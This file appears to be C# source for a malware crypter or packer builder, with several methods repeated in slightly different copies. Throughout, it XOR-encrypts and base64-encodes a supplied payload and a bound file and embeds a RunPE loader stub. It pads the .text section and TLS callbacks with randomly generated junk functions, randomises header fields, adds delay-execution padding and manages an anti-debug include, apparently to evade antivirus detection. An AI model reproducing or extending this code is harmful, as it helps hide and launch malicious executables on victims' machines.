public static string CompileArbitrary(string PathName, NewPE PE) { string TmpFile = Path.GetTempFileName(); ProcessStartInfo psi = new ProcessStartInfo(); psi.Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"", PE.PeDirectory.RootDirectoryPath, PathName, TmpFile); psi.FileName = PE.PeDirectory.CompilerPath; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; using (Process Proc = Process.Start(psi)) { using (StreamReader sReader = Proc.StandardOutput) { string res = sReader.ReadToEnd(); } } if (File.Exists(TmpFile)) { return(TmpFile); } else { return(null); } }
public static void CalculateNtHeader(NewPE PE, int nCountImportedModules) { PE.NtHeader.OptionalHeader.SizeOfCode = ALIGN_UP(GetSectionByName(".text", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment); PE.NtHeader.OptionalHeader.SizeOfInitializedData = ALIGN_UP(GetSectionByName(".idata", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment) + ALIGN_UP(GetSectionByName(".data", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment); #if TLS PE.NtHeader.OptionalHeader.SizeOfInitializedData += ALIGN_UP(GetSectionByName(".bss", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment); #endif PE.NtHeader.OptionalHeader.BaseOfCode = GetSectionByName(".text", PE).VirtualAddress; PE.NtHeader.OptionalHeader.BaseOfData = GetSectionByName(".idata", PE).VirtualAddress; // .data? PE.NtHeader.OptionalHeader.SizeOfHeaders = ALIGN_UP(PE.HeaderSize, PE.NtHeader.OptionalHeader.FileAlignment); PE.NtHeader.OptionalHeader.SizeOfImage = PE.Sections.Last.Value.VirtualAddress + ALIGN_UP(PE.Sections.Last.Value.VirtualSize, PE.NtHeader.OptionalHeader.SectionAlignment); PE.NtHeader.OptionalHeader.AddressOfEntryPoint = (uint)(GetSectionByName(".text", PE).VirtualAddress + PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS); // uint _magic = (uint)((nCountImportedModules + 1) * 20); PE.NtHeader.OptionalHeader.ImportDirectory.VirtualAddress = GetSectionByName(".idata", PE).VirtualAddress; PE.NtHeader.OptionalHeader.ImportDirectory.Size = GetSectionByName(".idata", PE).VirtualSize; // _magic; /// PE.NtHeader.OptionalHeader.ImportAddressTableDirectory.VirtualAddress = GetSectionByName(".idata", PE).VirtualAddress + _magic; /// PE.NtHeader.OptionalHeader.ImportAddressTableDirectory.Size = GetSectionByName(".idata", PE).VirtualSize - _magic; PE.NtHeader.OptionalHeader.TLSDirectory.VirtualAddress = GetSectionByName(".data", PE).VirtualAddress + (uint)PE.PeDirectory.RunPEObjectPath.ReadBytes().Length + 16; PE.NtHeader.OptionalHeader.TLSDirectory.Size = 0x24; #if TLS PE.NtHeader.OptionalHeader.TLSDirectory.VirtualAddress = GetSectionByName(".data", PE).VirtualAddress + (uint)PE.PeDirectory.RunPEObjectPath.ReadBytes().Length + 16; PE.NtHeader.OptionalHeader.TLSDirectory.Size = 0x24; #endif }
public static void EncryptCodeAndAddKey(NewPE PE) { byte[] pKey = new byte[16]; Keys.PopulateBuffer(pKey); byte[] pRunPE = PE.PeDirectory.RunPEObjectPath.ReadBytes(); Xor.EncodeDecodeData(pRunPE, pKey); if (File.Exists(PE.PeDirectory.RunPEObjectPath)) { File.Delete(PE.PeDirectory.RunPEObjectPath); } PE.PeDirectory.RunPEObjectPath.WriteFile(pRunPE); string KeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_key.inc"); string Format = pKey.ToASMBuffer(); if (File.Exists(KeyInclude)) { File.Delete(KeyInclude); } File.WriteAllText(KeyInclude, Format); PEFactory.CompileDataSection(PE); }
public static void InitializeNtHeader(NewPE PE) { // <--- File Header ---> { PE.NtHeader.FileHeader.Machine = 0x14c; PE.NtHeader.FileHeader.NumberOfSections = (ushort)PE.Sections.Count; PE.NtHeader.FileHeader.TimeDateStamp = (uint)_Random.Next(0x40000000, 0x4C000000); PE.NtHeader.FileHeader.PointerToSymbolTable = 0; PE.NtHeader.FileHeader.NumberOfSymbols = 0; PE.NtHeader.FileHeader.SizeOfOptionalHeader = 0xE0; PE.NtHeader.FileHeader.Characteristics = 0x103; } // <--- Optional Header ---> { // <--- LinkerVersions must match the Rich Signature ---> PE.NtHeader.OptionalHeader.MajorLinkerVersion = 0x06; PE.NtHeader.OptionalHeader.MinorLinkerVersion = 0x00; PE.NtHeader.OptionalHeader.MajorOperatingSystemVersion = 4; PE.NtHeader.OptionalHeader.MajorImageVersion = 4; PE.NtHeader.OptionalHeader.MajorSubsystemVersion = 4; PE.NtHeader.OptionalHeader.DllCharacteristics = 0x00; PE.NtHeader.OptionalHeader.ImageBase = 0x00400000; PE.NtHeader.OptionalHeader.SectionAlignment = 0x1000; PE.NtHeader.OptionalHeader.FileAlignment = 0x200; } }
public static void RemoveAntiDebug(NewPE PE, bool _RemoveAntiDebug) { if (_RemoveAntiDebug) { File.Delete(PE.PeDirectory.AntiDebugIncPath); File.WriteAllText(PE.PeDirectory.AntiDebugIncPath, string.Empty); } }
public void WriteLogicalTrashToTLSCallback(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier) { string TlsCallbackInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback.inc"); int sizeOfTLS = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE); int size_junk_added = 0; string[] tls = TlsCallbackInc.ReadLines(); for (int i = 0; i < tls.Length; i++) { if (tls[i].Contains(";[JUNK_NO_PRESERVE]")) { int len_trash = Rand.Next(0x100, 0x200); byte[] trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0); size_junk_added += trash_buffer.Length; tls[i] = trash_buffer.ToASMBuffer(); trash_buffer = new byte[0]; GC.Collect(); } if (tls[i].Contains(";[JUNK_FUNCS]")) { int xx = Rand.Next(3 * Multiplier, 5 * Multiplier); for (int jj = 0; jj < xx; jj++) { int func_len = Rand.Next(0x100, 0x120); byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x1000); tls[i] = string.Concat(tls[i], Environment.NewLine, func_buffer.ToASMBuffer(), Environment.NewLine); } } } if (File.Exists(TlsCallbackInc)) { File.Delete(TlsCallbackInc); } TlsCallbackInc.WriteLines(tls); sizeOfTLS = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE); JCI.SIZE_TLS_CALLBACK = sizeOfTLS + 3; // prologue; string AddrPayloadInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_address.inc"); string Format = "PAYLOAD_ADDRESS EQU 0x{0}"; Format = string.Format(Format, (JCI.SIZE_PRE_EP_FUNCTIONS + JCI.SIZE_TLS_CALLBACK + JCI.SIZE_EP_FUNCTION + JCI.SIZE_POST_EP_FUNCTIONS).ToString("X8")); File.WriteAllText(AddrPayloadInc, Format); GC.Collect(); }
public static void EncryptAndEncodeBind(NewPE PE, string BindPath) { byte[] pKey = PE.PeDirectory.PayloadKeyIncPath.ReadBytes(); byte[] pBind = BindPath.ReadBytes(); Xor.EncodeDecodeData(pBind, pKey); pBind = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pBind)); if (File.Exists(PE.PeDirectory.BindIncPath)) { File.Delete(PE.PeDirectory.BindIncPath); } File.WriteAllBytes(PE.PeDirectory.BindIncPath, pBind); }
public static void InitializeSections(NewPE PE) { // <--- Text Section ---> { PE_SECTION_HEADER TextSectionHeader = new PE_SECTION_HEADER() { Name = new char[] { '.', 't', 'e', 'x', 't' }, Characteristics = 0x60000020 }; PE.Sections.AddFirst(TextSectionHeader); } // <--- IData Section ---> { PE_SECTION_HEADER IDataSectionHeader = new PE_SECTION_HEADER() { Name = new char[] { '.', 'i', 'd', 'a', 't', 'a' }, Characteristics = 0x40000040 }; PE.Sections.AddLast(IDataSectionHeader); } // <--- Data Section ---> { PE_SECTION_HEADER DataSectionHeader = new PE_SECTION_HEADER() { Name = new char[] { '.', 'd', 'a', 't', 'a' }, Characteristics = 0xC0000040 }; PE.Sections.AddLast(DataSectionHeader); } #if TLS // <--- TLS Section ---> { PE_SECTION_HEADER TLSSectionHeader = new PE_SECTION_HEADER() { Name = new char[] { '.', 'b', 's', 's' }, Characteristics = 0xC0000040 }; PE.Sections.AddLast(TLSSectionHeader); } #endif }
public static void FixDecryptorLoop(NewPE PE) { string RunPELengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_length.inc"); string Format = "RUNPE_CODE_LENGTH EQU 0x{0}"; if (File.Exists(RunPELengthInclude)) { File.Delete(RunPELengthInclude); } Format = string.Format(Format, PE.PeDirectory.RunPEObjectPath.ReadBytes().Length.ToString("X8")); File.WriteAllText(RunPELengthInclude, Format); PEFactory.CompileTextSection(PE); }
public void WriteDelayExecutionTrash(xNewPE PE, bool bLong) { string[] olaf = PE.PeDirectory.DelayExecutionIncPath.ReadLines(); byte[] trash_buffer; if (!bLong) { int len_trash = Rand.Next(0x100, 0x120); trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0); } else { int len_trash = Rand.Next(0x100, 0x120); trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0); } for (int i = 0; i < olaf.Length; i++) { if (olaf[i].Contains("0x69")) { if (!bLong) { olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(25, 50).ToString("X8"))); } else { olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(3500000 * 5, 6000000 * 5).ToString("X8"))); } } if (olaf[i].Contains(";[JUNK_NO_PRESERVE]")) { if (!bLong) { olaf[i] = trash_buffer.ToASMBuffer(); } else { olaf[i] = trash_buffer.ToASMBuffer(); } } } File.Delete(PE.PeDirectory.DelayExecutionIncPath); PE.PeDirectory.DelayExecutionIncPath.WriteLines(olaf); }
public static void ConstructTLSCallback(NewPE PE) { string TLSOffsetInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback_offset.inc"); string Format = "TLS_CALLBACK_OFFSET EQU 0x{0}"; if (File.Exists(TLSOffsetInclude)) { File.Delete(TLSOffsetInclude); } Format = string.Format(Format, (PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS + PE.JunkInfo.SIZE_EP_FUNCTION).ToString("X8")); File.AppendAllText(TLSOffsetInclude, Format); PEFactory.CompileDataSection(PE); //PEFactory.CompileTLSSection(PE); }
public static void AddSectionDatas(NewPE PE) { File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine); File.AppendAllText(PE.PeDirectory.MainPath, string.Format("align 0x{0}, db 0", PE.NtHeader.OptionalHeader.FileAlignment.ToString("X8"))); File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine); foreach (PE_SECTION_HEADER SectionHeader in PE.Sections) { string WriteableName = string.Concat(new string(SectionHeader.Name).TrimStart('.').ToUpper(), ":"); File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine); File.AppendAllText(PE.PeDirectory.MainPath, WriteableName); File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine); File.AppendAllText(PE.PeDirectory.MainPath, string.Format( "\tincbin \"obj/{0}\"", Path.GetFileName(GetObjPathFromSectionName(new string(SectionHeader.Name), PE)))); File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine); File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine); File.AppendAllText(PE.PeDirectory.MainPath, string.Format("align 0x{0}, db 0", PE.NtHeader.OptionalHeader.FileAlignment.ToString("X8"))); File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine); } }
public static void EncryptAndEncodePayload(NewPE PE, string PayloadPath) { byte[] pKey = new byte[16]; Keys.PopulateBuffer(pKey); byte[] pFileBuffer = PayloadPath.ReadBytes(); Xor.EncodeDecodeData(pFileBuffer, pKey); pFileBuffer = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pFileBuffer)); string PayloadLengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_length.inc"); string Format = "PAYLOAD_LENGTH EQU 0x{0}"; Format = string.Format(Format, pFileBuffer.Length.ToString("X8")); if (File.Exists(PayloadLengthInclude)) { File.Delete(PayloadLengthInclude); } File.WriteAllText(PayloadLengthInclude, Format); string PayloadKeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_key.bin"); string PayloadInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload.bin"); if (File.Exists(PayloadKeyInclude)) { File.Delete(PayloadKeyInclude); } if (File.Exists(PayloadInclude)) { File.Delete(PayloadInclude); } File.WriteAllBytes(PayloadKeyInclude, pKey); File.WriteAllBytes(PayloadInclude, pFileBuffer); }
private static string GetObjPathFromSectionName(string Name, NewPE PE) { return(Directory.GetFiles(PE.PeDirectory.ObjDirectory).Where(F => Path.GetFileNameWithoutExtension(F) == Name.Trim('.')).FirstOrDefault()); }
public void WriteLogicalFunctionsToTextSection(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier) { string TxtSect = PE.PeDirectory.TextSectionPath.ReadText(); int size_pre_ep = 0; int size_ep = 0; int size_post_ep = 0; int pre_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier); int post_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier); // pre - ep for (int i = 0; i < pre_ep_func_cnt; i++) { int index_of = TxtSect.IndexOf(";[PRE_EP_FUNCTIONS]"); if (index_of > -1) { int func_len = Rand.Next(0x120, 0x200); byte[] func_buffer; if (Rand.NextDouble() >= 0.5) { func_buffer = new DataConstructor().GenData(func_len, func_len); } else { func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000); } // GenerateLogicalFunction(func_len, 0, 0, 0, 0);//GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000); // Console.WriteLine("Entropy Func: {0}", calc_entropy(func_buffer)); // pad entropy with zeros after func //int pad_len = Rand.Next(0x10, 0x25); //Array.Resize(ref func_buffer, func_buffer.Length + pad_len); TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine); size_pre_ep += func_buffer.Length; } } JCI.SIZE_PRE_EP_FUNCTIONS = size_pre_ep; // ep - { int index_of = TxtSect.IndexOf(";[EP_FUNCTION]"); if (index_of > -1) { int func_len = Rand.Next(0x120, 0x140); // const byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000); // pad entropy with zeros after func //int pad_len = Rand.Next(0x10, 0x25); //Array.Resize(ref func_buffer, func_buffer.Length + pad_len); TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine); size_ep += func_buffer.Length; } } JCI.SIZE_EP_FUNCTION = size_ep; //// post - ep for (int i = 0; i < post_ep_func_cnt; i++) { int index_of = TxtSect.IndexOf(";[POST_EP_FUNCTIONS]"); if (index_of > -1) { int func_len = Rand.Next(0x120, 0x200); byte[] func_buffer; if (Rand.NextDouble() >= 0.5) { func_buffer = new DataConstructor().GenData(func_len, func_len); } else { func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000); } // Console.WriteLine("Entropy Func: {0}", calc_entropy(func_buffer)); // pad entropy with zeros after func //int pad_len = Rand.Next(0x10, 0x25); //Array.Resize(ref func_buffer, func_buffer.Length + pad_len); TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine); size_post_ep += func_buffer.Length; } } JCI.SIZE_POST_EP_FUNCTIONS = size_post_ep; // PAD ENTROPY //int size_of_entropy_pad = 0x200; ;// ALIGN_UP(Rand.Next(0x200, 0x1000), (int)PE.NtHeader.OptionalHeader.FileAlignment); //byte[] zero_fill = new byte[0x1000]; //string path_inc = Path.Combine(PE.PeDirectory.IncludeDirectory, "zerofill.bin"); //path_inc.WriteFile(zero_fill); // JCI.SIZE_ENTROPY_PAD = (size_of_entropy_pad * 2); if (File.Exists(PE.PeDirectory.TextSectionPath)) { File.Delete(PE.PeDirectory.TextSectionPath); } PE.PeDirectory.TextSectionPath.WriteText(TxtSect, StringEncoding.ASCII); GC.Collect(); }
public static string CompileArbitrary(string PathName, NewPE PE) { string TmpFile = Path.GetTempFileName(); ProcessStartInfo psi = new ProcessStartInfo(); psi.Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"", PE.PeDirectory.RootDirectoryPath, PathName, TmpFile); psi.FileName = PE.PeDirectory.CompilerPath; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; using (Process Proc = Process.Start(psi)) { using (StreamReader sReader = Proc.StandardOutput) { string res = sReader.ReadToEnd(); } } if (File.Exists(TmpFile)) { return TmpFile; } else { return null; } }
public static void CompileTLSSection(NewPE PE) { CompileSection("bss", PE); }
private static void ReplaceSectionByName(string Name, PE_SECTION_HEADER NewSection, NewPE PE) { PE_SECTION_HEADER oldSection = GetSectionByName(Name, PE); PE.Sections.Find(oldSection).Value = NewSection; }
private static string GetObjPathFromSectionName(string Name, NewPE PE) { return Directory.GetFiles(PE.PeDirectory.ObjDirectory).Where(F => Path.GetFileNameWithoutExtension(F) == Name.Trim('.')).FirstOrDefault(); }
private static void CompileSection(string SectionName, NewPE _PE) { string SectionSourcePath; string SectionObjPath; switch (SectionName) { case "text": SectionSourcePath = _PE.PeDirectory.TextSectionPath; SectionObjPath = _PE.PeDirectory.TextObjectPath; break; case "data": SectionSourcePath = _PE.PeDirectory.DataSectionPath; SectionObjPath = _PE.PeDirectory.DataObjectPath; break; case "idata": SectionSourcePath = _PE.PeDirectory.IDataSectionPath; SectionObjPath = _PE.PeDirectory.IDataObjectPath; break; case "bss": SectionSourcePath = _PE.PeDirectory.TLSSectionPath; SectionObjPath = _PE.PeDirectory.TLSObjectPath; break; case "runpe": SectionSourcePath = _PE.PeDirectory.RunPESectionPath; SectionObjPath = _PE.PeDirectory.RunPEObjectPath; break; case "main": SectionSourcePath = _PE.PeDirectory.MainPath; SectionObjPath = _PE.PeDirectory.SavePath; break; default: SectionSourcePath = string.Empty; SectionObjPath = string.Empty; break; } if (File.Exists(SectionObjPath)) { File.Delete(SectionObjPath); } ProcessStartInfo psi = new ProcessStartInfo(); psi.Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"", _PE.PeDirectory.RootDirectoryPath, SectionSourcePath, SectionObjPath); psi.FileName = _PE.PeDirectory.CompilerPath; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; using (Process Proc = Process.Start(psi)) { using (StreamReader sReader = Proc.StandardOutput) { string res = sReader.ReadToEnd(); } } }
public static void CompileMain(NewPE PE) { CompileSection("main", PE); }
public static void CompileRunPESection(NewPE PE) { CompileSection("runpe", PE); }
public static void CompileIDataSection(NewPE PE) { CompileSection("idata", PE); }
public static void CompileTextSection(NewPE PE) { CompileSection("text", PE); }
public static void EncryptAndEncodePayload(NewPE PE, string PayloadPath) { byte[] pKey = new byte[16]; Keys.PopulateBuffer(pKey); byte[] pFileBuffer = PayloadPath.ReadBytes(); Xor.EncodeDecodeData(pFileBuffer, pKey); pFileBuffer = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pFileBuffer)); string PayloadLengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_length.inc"); string Format = "PAYLOAD_LENGTH EQU 0x{0}"; Format = string.Format(Format, pFileBuffer.Length.ToString("X8")); if (File.Exists(PayloadLengthInclude)) File.Delete(PayloadLengthInclude); File.WriteAllText(PayloadLengthInclude, Format); string PayloadKeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_key.bin"); string PayloadInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload.bin"); if (File.Exists(PayloadKeyInclude)) File.Delete(PayloadKeyInclude); if (File.Exists(PayloadInclude)) File.Delete(PayloadInclude); File.WriteAllBytes(PayloadKeyInclude, pKey); File.WriteAllBytes(PayloadInclude, pFileBuffer); }
public void WriteLogicalTrashToTLSCallback(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier) { string TlsCallbackInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback.inc"); int sizeOfTLS = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE); int size_junk_added = 0; string[] tls = TlsCallbackInc.ReadLines(); for (int i = 0; i < tls.Length; i++) { if (tls[i].Contains(";[JUNK_NO_PRESERVE]")) { int len_trash = Rand.Next(0x100, 0x200); byte[] trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0); size_junk_added += trash_buffer.Length; tls[i] = trash_buffer.ToASMBuffer(); trash_buffer = new byte[0]; GC.Collect(); } if (tls[i].Contains(";[JUNK_FUNCS]")) { int xx = Rand.Next(3 * Multiplier, 5 * Multiplier); for (int jj = 0; jj < xx; jj++) { int func_len = Rand.Next(0x100, 0x120); byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x1000); tls[i] = string.Concat(tls[i], Environment.NewLine, func_buffer.ToASMBuffer(), Environment.NewLine); } } } if (File.Exists(TlsCallbackInc)) File.Delete(TlsCallbackInc); TlsCallbackInc.WriteLines(tls); sizeOfTLS = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE); JCI.SIZE_TLS_CALLBACK = sizeOfTLS + 3; // prologue; string AddrPayloadInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_address.inc"); string Format = "PAYLOAD_ADDRESS EQU 0x{0}"; Format = string.Format(Format, (JCI.SIZE_PRE_EP_FUNCTIONS + JCI.SIZE_TLS_CALLBACK + JCI.SIZE_EP_FUNCTION + JCI.SIZE_POST_EP_FUNCTIONS).ToString("X8")); File.WriteAllText(AddrPayloadInc, Format); GC.Collect(); }
public static void EncryptAndEncodeBind(NewPE PE, string BindPath) { byte[] pKey = PE.PeDirectory.PayloadKeyIncPath.ReadBytes(); byte[] pBind = BindPath.ReadBytes(); Xor.EncodeDecodeData(pBind, pKey); pBind = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pBind)); if (File.Exists(PE.PeDirectory.BindIncPath)) File.Delete(PE.PeDirectory.BindIncPath); File.WriteAllBytes(PE.PeDirectory.BindIncPath, pBind); }
public static PE_SECTION_HEADER GetSectionByName(string Name, NewPE PE) { return PE.Sections.Where(Section => new string(Section.Name) == Name).FirstOrDefault(); }
public static PE_SECTION_HEADER GetSectionByName(string Name, NewPE PE) { return(PE.Sections.Where(Section => new string(Section.Name) == Name).FirstOrDefault()); }
public static void CalculateSectionHeaders(NewPE PE) { PE_SECTION_HEADER shText = GetSectionByName(".text", PE); PE_SECTION_HEADER shIData = GetSectionByName(".idata", PE); PE_SECTION_HEADER shData = GetSectionByName(".data", PE); #if TLS PE_SECTION_HEADER shTLS = GetSectionByName(".bss", PE); #endif uint sizeOfText = (uint)PE.PeDirectory.TextObjectPath.ReadBytes().Length; uint sizeOfIData = (uint)PE.PeDirectory.IDataObjectPath.ReadBytes().Length; uint sizeOfData = (uint)PE.PeDirectory.DataObjectPath.ReadBytes().Length; #if TLS uint sizeOfTLS = (uint)PE.PeDirectory.TLSObjectPath.ReadBytes().Length; #endif /* COMPUTE TEXT */ shText.VirtualSize = sizeOfText; shText.VirtualAddress = PE.NtHeader.OptionalHeader.SectionAlignment; shText.SizeOfRawData = ALIGN_UP(sizeOfText, PE.NtHeader.OptionalHeader.FileAlignment); shText.PointerToRawData = 0; /* COMPUTE IDATA */ shIData.VirtualSize = sizeOfIData; shIData.VirtualAddress = ((shText.VirtualAddress + ALIGN_UP(shText.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment))); shIData.SizeOfRawData = ALIGN_UP(sizeOfIData, PE.NtHeader.OptionalHeader.FileAlignment); shIData.PointerToRawData = 0; /* COMPUTE DATA */ shData.VirtualSize = sizeOfData; shData.VirtualAddress = ((shIData.VirtualAddress + ALIGN_UP(shIData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment))); shData.SizeOfRawData = ALIGN_UP(sizeOfData, PE.NtHeader.OptionalHeader.FileAlignment); shData.PointerToRawData = 0; #if TLS /* COMPUTE TLS */ shTLS.VirtualSize = sizeOfTLS; shTLS.VirtualAddress = ((shData.VirtualAddress + ALIGN_UP(shData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment))); shTLS.SizeOfRawData = ALIGN_UP(sizeOfTLS, PE.NtHeader.OptionalHeader.FileAlignment); shTLS.PointerToRawData = 0; #endif string SectionHeadersInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "section_addresses.inc"); if (File.Exists(SectionHeadersInclude)) File.Delete(SectionHeadersInclude); #if TLS string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" + "IDATA_SECTION_ADDRESS EQU 0x{1}\n" + "DATA_SECTION_ADDRESS EQU 0x{2}\n" + "TLS_SECTION_ADDRESS EQU 0x{3}\n"; Format = string.Format(Format, shText.VirtualAddress.ToString("X8"), shIData.VirtualAddress.ToString("X8"), shData.VirtualAddress.ToString("X8"), shTLS.VirtualAddress.ToString("X8")); #else string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" + "IDATA_SECTION_ADDRESS EQU 0x{1}\n" + "DATA_SECTION_ADDRESS EQU 0x{2}\n"; Format = string.Format(Format, shText.VirtualAddress.ToString("X8"), shIData.VirtualAddress.ToString("X8"), shData.VirtualAddress.ToString("X8")); #endif File.WriteAllText(SectionHeadersInclude, Format); PEFactory.CompileTextSection(PE); PEFactory.CompileIDataSection(PE); PEFactory.CompileRunPESection(PE); PEFactory.CompileDataSection(PE); #if TLS PEFactory.CompileTLSSection(PE); #endif ReplaceSectionByName(".text", shText, PE); ReplaceSectionByName(".idata", shIData, PE); ReplaceSectionByName(".data", shData, PE); #if TLS ReplaceSectionByName(".bss", shTLS, PE); #endif }
public static void CalculateSectionHeaders(NewPE PE) { PE_SECTION_HEADER shText = GetSectionByName(".text", PE); PE_SECTION_HEADER shIData = GetSectionByName(".idata", PE); PE_SECTION_HEADER shData = GetSectionByName(".data", PE); #if TLS PE_SECTION_HEADER shTLS = GetSectionByName(".bss", PE); #endif uint sizeOfText = (uint)PE.PeDirectory.TextObjectPath.ReadBytes().Length; uint sizeOfIData = (uint)PE.PeDirectory.IDataObjectPath.ReadBytes().Length; uint sizeOfData = (uint)PE.PeDirectory.DataObjectPath.ReadBytes().Length; #if TLS uint sizeOfTLS = (uint)PE.PeDirectory.TLSObjectPath.ReadBytes().Length; #endif /* COMPUTE TEXT */ shText.VirtualSize = sizeOfText; shText.VirtualAddress = PE.NtHeader.OptionalHeader.SectionAlignment; shText.SizeOfRawData = ALIGN_UP(sizeOfText, PE.NtHeader.OptionalHeader.FileAlignment); shText.PointerToRawData = 0; /* COMPUTE IDATA */ shIData.VirtualSize = sizeOfIData; shIData.VirtualAddress = ((shText.VirtualAddress + ALIGN_UP(shText.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment))); shIData.SizeOfRawData = ALIGN_UP(sizeOfIData, PE.NtHeader.OptionalHeader.FileAlignment); shIData.PointerToRawData = 0; /* COMPUTE DATA */ shData.VirtualSize = sizeOfData; shData.VirtualAddress = ((shIData.VirtualAddress + ALIGN_UP(shIData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment))); shData.SizeOfRawData = ALIGN_UP(sizeOfData, PE.NtHeader.OptionalHeader.FileAlignment); shData.PointerToRawData = 0; #if TLS /* COMPUTE TLS */ shTLS.VirtualSize = sizeOfTLS; shTLS.VirtualAddress = ((shData.VirtualAddress + ALIGN_UP(shData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment))); shTLS.SizeOfRawData = ALIGN_UP(sizeOfTLS, PE.NtHeader.OptionalHeader.FileAlignment); shTLS.PointerToRawData = 0; #endif string SectionHeadersInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "section_addresses.inc"); if (File.Exists(SectionHeadersInclude)) { File.Delete(SectionHeadersInclude); } #if TLS string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" + "IDATA_SECTION_ADDRESS EQU 0x{1}\n" + "DATA_SECTION_ADDRESS EQU 0x{2}\n" + "TLS_SECTION_ADDRESS EQU 0x{3}\n"; Format = string.Format(Format, shText.VirtualAddress.ToString("X8"), shIData.VirtualAddress.ToString("X8"), shData.VirtualAddress.ToString("X8"), shTLS.VirtualAddress.ToString("X8")); #else string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" + "IDATA_SECTION_ADDRESS EQU 0x{1}\n" + "DATA_SECTION_ADDRESS EQU 0x{2}\n"; Format = string.Format(Format, shText.VirtualAddress.ToString("X8"), shIData.VirtualAddress.ToString("X8"), shData.VirtualAddress.ToString("X8")); #endif File.WriteAllText(SectionHeadersInclude, Format); PEFactory.CompileTextSection(PE); PEFactory.CompileIDataSection(PE); PEFactory.CompileRunPESection(PE); PEFactory.CompileDataSection(PE); #if TLS PEFactory.CompileTLSSection(PE); #endif ReplaceSectionByName(".text", shText, PE); ReplaceSectionByName(".idata", shIData, PE); ReplaceSectionByName(".data", shData, PE); #if TLS ReplaceSectionByName(".bss", shTLS, PE); #endif }
public static void ConstructTLSCallback(NewPE PE) { string TLSOffsetInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback_offset.inc"); string Format = "TLS_CALLBACK_OFFSET EQU 0x{0}"; if (File.Exists(TLSOffsetInclude)) File.Delete(TLSOffsetInclude); Format = string.Format(Format, (PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS + PE.JunkInfo.SIZE_EP_FUNCTION).ToString("X8")); File.AppendAllText(TLSOffsetInclude, Format); PEFactory.CompileDataSection(PE); //PEFactory.CompileTLSSection(PE); }
